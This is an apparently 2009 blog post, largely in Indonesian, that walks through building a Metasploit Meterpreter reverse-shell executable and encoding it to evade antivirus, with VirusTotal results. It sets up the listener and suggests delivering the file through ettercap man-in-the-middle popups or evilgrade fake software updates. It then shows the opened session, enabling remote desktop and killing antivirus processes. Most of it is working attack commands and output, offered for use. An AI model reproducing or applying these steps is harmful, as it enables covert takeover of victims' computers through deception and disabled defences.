Posted by kecoak on Mar 1, 2009 in
Bug & Exploit,
Tips and Trick |
1 comment
.so lets make ur choice kiddo,dengan mengacu sebelumnya pada artikel. .meterpreter non encode.
[email protected]:/pentest/exploits/framework3# ./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.0.12 LPORT=455 X > meterpreter_1.exe Created by msfpayload (http://www.metasploit.com). Payload: windows/meterpreter/reverse_tcp Length: 278 Options: LHOST=192.168.0.12,LPORT=455 http://www.virustotal.com/analisis/4b0a655b264b23b2f4dab74688c8890e Result: 1/39 .meterpreter with encode XOR.
[email protected]:/pentest/exploits/framework3# ./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.0.12 LPORT=455 R | ./msfencode -e x86/shikata_ga_nai -b '' -t exe -o meterpreter_2.exe [*] x86/shikata_ga_nai succeeded, final size 306 http://www.virustotal.com/analisis/cbb1cf1a7ce9943c5d8d15f210da8361 Result: 0/39 (0%) msf > use exploit/multi/handler msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp PAYLOAD => windows/meterpreter/reverse_tcp msf exploit(handler) > set LHOST 192.168.0.12 LHOST => 192.168.0.12 msf exploit(handler) > set LPORT 455 LPORT => 455 msf exploit(handler) > exploit [*] Handler binding to LHOST 0.0.0.0 [*] Started reverse handler [*] Starting the payload handler... .next move is critical,well sekarang attacker membuat target agar mengeksekusi meterpreter_2.exe sebeneranya ini tergantung imajinasi anda sendiri. .penulis sendiri memilih ettercap sebagai jembatan menggunakan metode MITM. bisa dengan ettercap filter yang akan membuat popup setiap target melakukan browsing. .ataupun dengan kombinasi evilgrade( www.infobyte.com.ar )+ettercap dengan DNS spoofing secara tidak langsung akan mengelabui target untuk melakukan fake patch untuk beberapa program yang ada di evilgrade exam: winamp,winzip,notepad++ bisa juga menambahkan modul tersendiri di evilgrade; firefox ataupun thunderbird (-.-)”. .setelah target mengeksekusi meterperter_2.exe. [*] Transmitting intermediate stager for over-sized stage...(191 bytes) [*] Sending stage (2650 bytes) [*] Sleeping before handling stage... [*] Uploading DLL (75787 bytes)... [*] Upload completed. [*] Meterpreter session 1 opened (192.168.0.12:455 -> 192.168.0.5:1037) meterpreter > sysinfo Computer: PENTEST3 OS : Windows XP (Build 2600, Service Pack 3). .with remote desktop. .there is for Virtual Network Computing look, im prefer CLI than GUI (^^)V. meterpreter > run getgui -----------------passing------------------------ .kill AV. meterpreter > run killav [*] Killing Antivirus services on the target... .ok bisa juga dengan mengedit killav.rb untuk menambahkan beberapa list AV tersendiri.
[email protected]:~# vi /pentest/exploits/framework3/scripts/meterpreter/killav.rb # # Meterpreter script that kills all Antivirus processes # Provided by: Jerome Athias # print_status("Killing Antivirus...